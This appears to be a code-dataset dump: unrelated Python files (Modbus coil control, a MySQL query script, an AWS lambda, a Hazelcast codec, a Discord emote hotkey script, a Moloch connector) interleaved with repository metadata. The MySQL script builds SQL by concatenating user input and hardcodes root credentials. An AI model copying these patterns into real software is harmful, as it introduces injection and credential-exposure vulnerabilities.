self.send_str = self._command_head(6)
s = struct.Struct('>BBHH')
values = (self.station_address,
1,
self.coil_address,
8)
self.send_str += s.pack(*values)
log.info('Adam-6017 read_coil_status...')
return self.call(self.send_str)
# function code is 5
def force_single_coil(self, address, action):
if action.upper() == 'OFF':
act = 0x0000
elif action.upper() == 'ON':
act = 0xFF00
else:
act = 0xFFFF
self.send_str = self._command_head(6)
s = struct.Struct('>BBHH')
values = (self.station_address,
5,
address,
act)
self.send_str += s.pack(*values)
log.info('Adam-6017 Function[0x05]({})'.format(action, address))
return self.call(self.send_str)
# function code is f
def force_multi_coils(self, data):
self.send_str = self._command_head(8)
s = struct.Struct('>BBHHBB')
values = (self.station_address,
0x0f,
self.coil_address,
0x08,
0x01,
data)
self.send_str += s.pack(*values)
log.info('Adam-6017 Function[0x0F]({})'.format(data))
return self.call(self.send_str)
def call(self, cmd):
log.info('Try to send: {}'.format(cmd))
if self.transport:
self.transport.write(cmd)
log.debug('send cmd to server: {}'.format(cmd))
else:
log.error('Invalid server transport.')
# zone = 0: do-0
# zone = 1: do-1
def alarm_task(self, action, task, zone=0):
if action.upper() == 'OFF':
self.coils_state &= ~(1 << zone)
elif action.upper() == 'ON':
self.coils_state |= (1 << zone)
else:
self.coils_state = 0
self.force_single_coil(self.coil_address + zone,
action)
# self.read_coils_status()
# self.force_multi_coils(self.coils_state)
if __name__ == '__main__':
log = logging.getLogger("")
formatter = logging.Formatter("%(asctime)s %(levelname)s " +
"[%(module)s:%(lineno)d] %(message)s")
# log the things
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
log.addHandler(ch)
loop = asyncio.get_event_loop()
port = 8502
host = '127.0.0.1'
adam = Adam(loop, host, port)
asyncio.sleep(10)
adam.alarm_task('ON', 1)
adam.alarm_task('OFF', 1)
adam.alarm_task('release', 1)
adam.alarm_task('ON', 1, 1)
adam.alarm_task('OFF', 1, 1)
adam.alarm_task('release', 1, 1)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
| 28.685083
| 72
| 0.548151
| 612
| 5,192
| 4.486928
| 0.264706
| 0.029133
| 0.040058
| 0.025492
| 0.237436
| 0.171522
| 0.124181
| 0.124181
| 0.124181
| 0.095776
| 0
| 0.028927
| 0.334168
| 5,192
| 180
| 73
| 28.844444
| 0.765404
| 0.061633
| 0
| 0.192593
| 0
| 0
| 0.092219
| 0.009675
| 0
| 0
| 0.008646
| 0
| 0
| 1
| 0.081481
| false
| 0.007407
| 0.022222
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9e0f660874b7198857a18d3f6b0c75b556083fb
| 721
|
py
|
Python
|
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
forMySQL/countupgetpoints.py
|
ryosuke0503/DockerMySQL
|
c1f3a8e92623cdf0297cd6f721fb9d92046f4091
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import mysql.connector
import pandas as pd
import sys
#tablename = str(sys.argv[1])
csvname = "result1232.csv"
#総得点を出したいチーム名
target = str(sys.argv[1])
# 接続する
conn = mysql.connector.connect(
host="localhost",
database="toto",
user="root",
password="root"
)
print("connection: "+str(conn.is_connected()))
# カーソルを取得する
cur = conn.cursor(buffered=True, dictionary=True)
mysql = "SELECT SUM(IF( home='"+target+"' , homescore , IF( away='"+target+"' , awayscore , 0))) FROM matches;"
cur.execute(mysql)
ret=cur.fetchone()
mysql = "SUM(IF( home='"+target+"' , homescore , IF( away='"+target+"' , awayscore , 0)))"
#print(ret)
print(ret[mysql])
conn.commit()
cur.close()
conn.close()
| 22.53125
| 111
| 0.660194
| 95
| 721
| 5
| 0.568421
| 0.058947
| 0.042105
| 0.046316
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0.193684
| 0
| 0.014469
| 0.137309
| 721
| 32
| 112
| 22.53125
| 0.749196
| 0.120666
| 0
| 0
| 0
| 0
| 0.299363
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.047619
| 0.142857
| 0
| 0.142857
| 0.095238
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7567342e6e2ce849445abb8610ff24fc2aab8a0f
| 558
|
py
|
Python
|
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | 9
|
2021-10-01T08:21:03.000Z
|
2022-03-02T14:34:16.000Z
|
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | null | null | null |
stack/lambdas/rekopoc-check-status/lambda_function.py
|
anapt/rekognition-video-people-blurring-cdk
|
ce1a57178bcd81a17d7f287ff4ccf2be6aae93b2
|
[
"MIT-0"
] | 3
|
2021-10-01T08:33:32.000Z
|
2022-02-02T22:40:48.000Z
|
import boto3
reko = boto3.client('rekognition')
s3 = boto3.client('s3')
def lambda_handler(event, context):
job_id = event['job_id']
reko_client = boto3.client('rekognition')
response = reko_client.get_face_detection(JobId=job_id, MaxResults=100)
return {
"statusCode": 200,
"body":
{
"job_id": job_id,
"job_status": response['JobStatus'],
"s3_object_bucket": event['s3_object_bucket'],
"s3_object_key": event['s3_object_key']
}
}
| 26.571429
| 75
| 0.577061
| 62
| 558
| 4.887097
| 0.467742
| 0.082508
| 0.145215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040609
| 0.293907
| 558
| 20
| 76
| 27.9
| 0.728426
| 0
| 0
| 0
| 0
| 0
| 0.227599
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756a6183aee4660b960c432b4510670a699bf9cb
| 1,314
|
py
|
Python
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 98
|
2015-12-08T14:26:27.000Z
|
2022-03-23T17:44:11.000Z
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 396
|
2016-02-23T11:07:55.000Z
|
2022-03-31T14:26:34.000Z
|
hazelcast/protocol/codec/count_down_latch_await_codec.py
|
tonytheonlypony/hazelcast-python-client
|
3aafeaf2ebc05aee4f2386c62c079db496a7c81f
|
[
"Apache-2.0"
] | 62
|
2015-12-09T11:20:53.000Z
|
2022-01-28T01:30:54.000Z
|
from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.codec.custom.raft_group_id_codec import RaftGroupIdCodec
from hazelcast.protocol.builtin import StringCodec
# hex: 0x0B0200
_REQUEST_MESSAGE_TYPE = 721408
# hex: 0x0B0201
_RESPONSE_MESSAGE_TYPE = 721409
_REQUEST_INVOCATION_UID_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_TIMEOUT_MS_OFFSET = _REQUEST_INVOCATION_UID_OFFSET + UUID_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_TIMEOUT_MS_OFFSET + LONG_SIZE_IN_BYTES
_RESPONSE_RESPONSE_OFFSET = RESPONSE_HEADER_SIZE
def encode_request(group_id, name, invocation_uid, timeout_ms):
buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
FixSizedTypesCodec.encode_uuid(buf, _REQUEST_INVOCATION_UID_OFFSET, invocation_uid)
FixSizedTypesCodec.encode_long(buf, _REQUEST_TIMEOUT_MS_OFFSET, timeout_ms)
RaftGroupIdCodec.encode(buf, group_id)
StringCodec.encode(buf, name, True)
return OutboundMessage(buf, True)
def decode_response(msg):
initial_frame = msg.next_frame()
return FixSizedTypesCodec.decode_boolean(initial_frame.buf, _RESPONSE_RESPONSE_OFFSET)
| 43.8
| 127
| 0.853881
| 167
| 1,314
| 6.221557
| 0.305389
| 0.06256
| 0.080847
| 0.075072
| 0.162656
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020101
| 0.091324
| 1,314
| 29
| 128
| 45.310345
| 0.850084
| 0.020548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.238095
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756b0adc0964779163796787d2e6398c5eb4706e
| 980
|
py
|
Python
|
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
LeetCode/088 Merge Sorted Array.py
|
gesuwen/Algorithms
|
0c9cf4412d76f8b69ef68cc80636323f5a0e5786
|
[
"MIT"
] | null | null | null |
# Array; Two Pointers
# Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array.
#
# Note:
#
# The number of elements initialized in nums1 and nums2 are m and n respectively.
# You may assume that nums1 has enough space (size that is greater or equal to m + n) to hold additional elements from nums2.
# Example:
#
# Input:
# nums1 = [1,2,3,0,0,0], m = 3
# nums2 = [2,5,6], n = 3
#
# Output: [1,2,2,3,5,6]
class Solution:
def merge(self, nums1, m, nums2, n):
"""
:type nums1: List[int]
:type m: int
:type nums2: List[int]
:type n: int
:rtype: void Do not return anything, modify nums1 in-place instead.
"""
p, q = m-1, n-1
while p >= 0 and q >= 0:
if nums1[p] > nums2[q]:
nums1[p+q+1] = nums1[p]
p -= 1
else:
nums1[p+q+1] = nums2[q]
q -= 1
nums1[:q+1] = nums2[:q+1]
| 28.823529
| 125
| 0.533673
| 155
| 980
| 3.374194
| 0.458065
| 0.01912
| 0.049713
| 0.030593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07716
| 0.338776
| 980
| 33
| 126
| 29.69697
| 0.729938
| 0.570408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756bf0598578d01db0afb38f8bafb682754f2e0c
| 1,007
|
py
|
Python
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | 1
|
2019-06-04T22:05:12.000Z
|
2019-06-04T22:05:12.000Z
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | 6
|
2019-04-17T17:21:42.000Z
|
2019-09-11T16:15:28.000Z
|
caf_verilog/test/test_capture_buffer.py
|
chiranthsiddappa/caf_verilog
|
cd3cfd00459dc03518fcce53d5d6ac5194fb2adc
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from .. import capture_buffer as capt_buff
from tempfile import mkdtemp
import os
class TestCaptureBuffer(TestCase):
def test_capture_buffer(self):
"""
Test that the files are written out for instantiation and testbench.
:return:
"""
tmpdir = mkdtemp()
cb = capt_buff.CaptureBuffer(100, output_dir=tmpdir)
cb.gen_tb()
files = os.listdir(tmpdir)
test_files = ['capture_buffer.v', 'capture_buffer_tb.v', 'capture_buffer_values.txt']
for file in test_files:
self.assertIn(file, files)
def test_capture_buffer_values_file(self):
"""
Test the file length of capture buffer values file.
:return:
"""
tmpdir = mkdtemp()
cb = capt_buff.CaptureBuffer(100, output_dir=tmpdir)
with open(os.path.join(tmpdir, 'capture_buffer_values.txt')) as cbv:
lines = len(cbv.readlines())
self.assertEqual(100, lines)
| 31.46875
| 93
| 0.637537
| 123
| 1,007
| 5.04065
| 0.439024
| 0.167742
| 0.122581
| 0.064516
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0.193548
| 0
| 0.012228
| 0.269116
| 1,007
| 31
| 94
| 32.483871
| 0.830163
| 0.137041
| 0
| 0.210526
| 0
| 0
| 0.105459
| 0.062035
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0
| 0.210526
| 0
| 0.368421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756c7eea74e1f5249521b52dff9a4f1dfed719d3
| 933
|
py
|
Python
|
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | null | null | null |
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | 3
|
2018-02-21T20:25:32.000Z
|
2018-02-23T18:25:44.000Z
|
db_to_excel.py
|
jfernandez04/fromdb_to_excel
|
f06bfbd83825f887afc814706dc6c34e6ba44f17
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import mysql.connector
import xlsxwriter
from query import q, table,columns
from letters import letters
import string
import json
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(dir_path + '/config.json', "r") as json_data_file:
conf = json.load(json_data_file)
conn = mysql.connector.connect(**conf)
cur = conn.cursor()
cur.execute("set innodb_lock_wait_timeout=100;")
q_describe = "describe " + table + ";"
cur.execute(q_describe)
bdescribe = cur.fetchall()
wb = xlsxwriter.Workbook('test.xlsx')
ws = wb.add_worksheet()
col = 0
for bdes_row in bdescribe:
ws.write(string.upper(letters[col] + str(1)), bdes_row[0])
col += 1
num1 = 2
col = 0
num = 1
cur.execute(q)
data = cur.fetchall()
for row in data:
col = 0
for line in range(len(row)):
l = letters[col] + str(num1)
ws.write(string.upper(l), row[line])
col += 1
num1 += 1
wb.close()
| 21.697674
| 62
| 0.681672
| 148
| 933
| 4.175676
| 0.459459
| 0.048544
| 0.038835
| 0.058252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022164
| 0.177921
| 933
| 42
| 63
| 22.214286
| 0.783572
| 0.012862
| 0
| 0.142857
| 0
| 0
| 0.070729
| 0.031556
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756f24ba8abf0f406f6c9f0a863f8c02bdb32b06
| 1,317
|
py
|
Python
|
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | 2
|
2021-06-22T19:31:52.000Z
|
2021-07-14T21:33:01.000Z
|
setup.py
|
tyler-a-cox/radio_sim
|
e54891905597578e2be6a9e6a9a201ba1cbd603c
|
[
"BSD-2-Clause"
] | null | null | null |
from setuptools import setup
import os
import sys
import json
sys.path.append("radio_sim")
def package_files(package_dir, subdirectory):
# walk the input package_dir/subdirectory
# return a package_data list
paths = []
directory = os.path.join(package_dir, subdirectory)
for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
path = path.replace(package_dir + "/", "")
paths.append(os.path.join(path, filename))
return paths
data_files = package_files("hera_cal", "data") + package_files(
"hera_cal", "calibrations"
)
setup_args = {
"name": "radio_sim",
"version": "0.0.2",
"author": "Tyler Cox",
"url": "https://github.com/tyler-a-cox/radio_sim",
"license": "BSD",
"description": "Simple radio interferometer simulator for testing nucal",
"package_dir": {"radio_sim": "radio_sim"},
"packages": ["radio_sim"],
"include_package_data": True,
"scripts": [],
"package_data": {"radio_sim": data_files},
"install_requires": [
"numpy>=1.10",
"scipy",
"astropy",
"pyuvdata",
],
"extras_require": {
"all": [
"aipy>=3.0",
]
},
"zip_safe": False,
}
if __name__ == "__main__":
setup(*(), **setup_args)
| 23.945455
| 77
| 0.603645
| 152
| 1,317
| 4.993421
| 0.506579
| 0.073781
| 0.086957
| 0.050066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007976
| 0.238421
| 1,317
| 54
| 78
| 24.388889
| 0.748754
| 0.050114
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.093023
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
756fb9d469af8300eef5fa58dfbcbd277e34d405
| 1,959
|
py
|
Python
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 11
|
2021-09-01T23:10:51.000Z
|
2022-03-20T07:39:37.000Z
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 22
|
2021-05-18T14:10:27.000Z
|
2021-10-04T15:06:27.000Z
|
oremda/pipeline/engine/__init__.py
|
OpenChemistry/oremda
|
3fb4cb8318713b87ecd7999ee2b725da745dd023
|
[
"BSD-3-Clause"
] | 2
|
2021-09-01T22:11:13.000Z
|
2021-10-30T09:12:36.000Z
|
import asyncio
import logging
import sys
import coloredlogs
import signal
from oremda.typing import ContainerType
from oremda.clients.singularity import SingularityClient
from oremda.pipeline.engine.rpc.client import RpcClient
from oremda.pipeline.engine.context import pipeline_context
from oremda.pipeline.engine.config import settings
# Setup logger
logger = logging.getLogger("engine")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = coloredlogs.ColoredFormatter(
"%(asctime)s,%(msecs)03d - %(name)s - %(levelname)s - %(message)s"
)
handler.setFormatter(formatter)
logger.addHandler(handler)
async def run():
# Set the Singularity image path if we are using Singularity
if settings.OREMDA_CONTAINER_TYPE == ContainerType.Singularity:
SingularityClient.images_dir = settings.OREMDA_SINGULARITY_IMAGE_DIR
with pipeline_context() as context:
async with RpcClient(settings.SERVER_URL, context) as client:
logger.info("Connected to server.")
await client.wait_on_reader()
async def shutdown(signal, loop, run_task):
logger.info(f"Received exit signal {signal.name}...")
logger.info("Canceling engine task.")
if run_task is not None:
run_task.cancel()
tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task()]
if len(tasks) > 0:
logger.info(f"Waiting for {len(tasks)} to complete.")
await asyncio.wait(tasks)
logger.info("Stopping event loop.")
loop = asyncio.get_event_loop()
loop.stop()
def start():
logger.info("Starting pipeline engine.")
loop = asyncio.get_event_loop()
run_task = loop.create_task(run())
signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
for s in signals:
loop.add_signal_handler(
s, lambda s=s: asyncio.create_task(shutdown(s, loop, run_task))
)
loop.run_forever()
| 29.681818
| 79
| 0.720265
| 255
| 1,959
| 5.427451
| 0.392157
| 0.043353
| 0.039017
| 0.052023
| 0.033237
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00186
| 0.176621
| 1,959
| 65
| 80
| 30.138462
| 0.856169
| 0.036243
| 0
| 0.041667
| 0
| 0.020833
| 0.122546
| 0.012202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020833
| false
| 0
| 0.208333
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7570df54465fd5d936a3ab3554540e61e267bf96
| 2,369
|
py
|
Python
|
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
main.py
|
RareDrops/discord-emote-script
|
bc1f4892fd4294449b2340a51b276e4ebb3b37e6
|
[
"MIT"
] | null | null | null |
from pynput import keyboard
from pynput.keyboard import Key, Controller
from os.path import exists
import win32clipboard
import os
from PIL import Image
from pystray import Icon as icon, Menu, MenuItem as item
import pystray
RECORDING = False
WORD = ""
keyboard_press = Controller()
def send_to_clipboard(filepath):
win32clipboard.OpenClipboard()
win32clipboard.EmptyClipboard()
#the two lines of code below only works for some programs, does work on disocrd though(it is to preserve transparency)
wide_path = os.path.abspath(filepath).encode('utf-16-le') + b'\0'
win32clipboard.SetClipboardData(win32clipboard.RegisterClipboardFormat('FileNameW'), wide_path)
win32clipboard.CloseClipboard()
#then simulates pressing ctrl+v using the keyboard module:
keyboard_press.release(Key.shift_r)
with keyboard_press.pressed(Key.ctrl):
keyboard_press.press('v')
keyboard_press.release('v')
keyboard_press.press(Key.backspace)
keyboard_press.release(Key.backspace)
def find_image(word):
filepath = f"Emotes/{word.lower()}.png"
file_exist = exists(filepath)
if file_exist == False:
return
image = Image.open(filepath)
if image.size != (48, 48):
image = image.resize((48, 48))
image.save(filepath)
send_to_clipboard(filepath)
def on_press(key):
global RECORDING, WORD
try:
if key.char == ':':
if RECORDING == False:
RECORDING = True
else:
RECORDING = False
find_image(WORD)
WORD = ""
elif RECORDING == True:
WORD += key.char
if len(WORD) > 30:
RECORDING = False
WORD = ""
except AttributeError:
if RECORDING == True:
if key == Key.backspace:
WORD = WORD[:-1]
elif key == Key.enter:
RECORDING = False
WORD = ""
# Collect events until released
listener = keyboard.Listener(on_press=on_press)
listener.start()
temp_iterable = []
image = Image.open('keyboard.ico')
icon = pystray.Icon('discord-emotes',image,'discord-emotes',temp_iterable)
menu = Menu(item('quit',lambda : icon.stop()),)
icon.menu = menu
icon.run()
| 29.987342
| 123
| 0.61545
| 268
| 2,369
| 5.354478
| 0.425373
| 0.063415
| 0.037631
| 0.032056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015376
| 0.286197
| 2,369
| 78
| 124
| 30.371795
| 0.833235
| 0.086112
| 0
| 0.126984
| 0
| 0
| 0.044273
| 0.012031
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.126984
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7571df3479e0827912764d9107db9cc7c8bfd97c
| 27,986
|
py
|
Python
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:18:41.000Z
|
2022-02-13T19:18:41.000Z
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | 2
|
2021-12-09T01:35:35.000Z
|
2022-02-24T20:04:27.000Z
|
moloch_connector.py
|
splunk-soar-connectors/moloch
|
d1956ee500b2c3f3882f3512366ae480270e89f8
|
[
"Apache-2.0"
] | null | null | null |
# File: moloch_connector.py
#
# Copyright (c) 2019-2022 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
#
import ipaddress
import json
import os
import magic
import phantom.app as phantom
import phantom.rules as ph_rules
import requests
from bs4 import BeautifulSoup, UnicodeDammit
from phantom.action_result import ActionResult
from phantom.base_connector import BaseConnector
from requests.auth import HTTPDigestAuth
from moloch_consts import *
class RetVal(tuple):
def __new__(cls, val1, val2):
return tuple.__new__(RetVal, (val1, val2))
class MolochConnector(BaseConnector):
def __init__(self):
# Call the BaseConnectors init first
super(MolochConnector, self).__init__()
self._state = None
self._server_url = None
self._port = None
self._username = None
self._password = None
self._verify_server_cert = False
def initialize(self):
""" This is an optional function that can be implemented by the AppConnector derived class. Since the
configuration dictionary is already validated by the time this function is called, it's a good place to do any
extra initialization of any internal modules. This function MUST return a value of either phantom.APP_SUCCESS or
phantom.APP_ERROR. If this function returns phantom.APP_ERROR, then AppConnector::handle_action will not get
called.
"""
self._state = self.load_state()
# get the asset config
config = self.get_config()
# Access values in asset config by the name
self._server_url = config[MOLOCH_CONFIG_SERVER_URL].strip('/')
self._port = config.get(MOLOCH_CONFIG_PORT, 8005)
self._username = config[MOLOCH_CONFIG_USERNAME]
self._password = config[MOLOCH_CONFIG_PASSWORD]
self._verify_server_cert = config.get(MOLOCH_VERIFY_SERVER_CERT, False)
# Custom validation for IP address
self.set_validator(MOLOCH_PARAM_IP, self._is_ip)
return phantom.APP_SUCCESS
def _is_ip(self, ip_address):
""" Function that checks given address and return True if address is valid IP address.
:param ip_address: IP address
:return: status (success/failure)
"""
# Throws exception if IP is not valid IPv4 or IPv6
try:
ipaddress.ip_address(UnicodeDammit(ip_address).unicode_markup)
except Exception as e:
self.debug_print(MOLOCH_INVALID_IP, e)
return False
return True
def _process_empty_reponse(self, response, action_result):
""" This function is used to process empty response.
:param response: response data
:param action_result: object of Action Result
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
"""
if response.status_code == 200:
return RetVal(phantom.APP_SUCCESS, {})
return RetVal(action_result.set_status(phantom.APP_ERROR, "Empty response and no information in the header"),
None)
def _process_html_response(self, response, action_result):
""" This function is used to process html response.
:param response: response data
:param action_result: object of Action Result
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
"""
# An html response, treat it like an error
status_code = response.status_code
try:
soup = BeautifulSoup(response.text, "html.parser")
# Remove the script, style, footer and navigation part from the HTML message
for element in soup(["script", "style", "footer", "nav"]):
element.extract()
error_text = soup.text
split_lines = error_text.split('\n')
split_lines = [x.strip() for x in split_lines if x.strip()]
error_text = '\n'.join(split_lines)
except:
error_text = "Cannot parse error details"
message = "Status Code: {0}. Data from server:\n{1}\n".format(status_code, error_text)
message = message.replace('{', '{{').replace('}', '}}')
return RetVal(action_result.set_status(phantom.APP_ERROR, message), None)
def _process_json_response(self, response, action_result):
""" This function is used to process json response.
:param response: response data
:param action_result: object of Action Result
:return: status phantom.APP_ERROR/phantom.APP_SUCCESS(along with appropriate message)
"""
# Try a json parse
try:
resp_json = response.json()
except Exception as e:
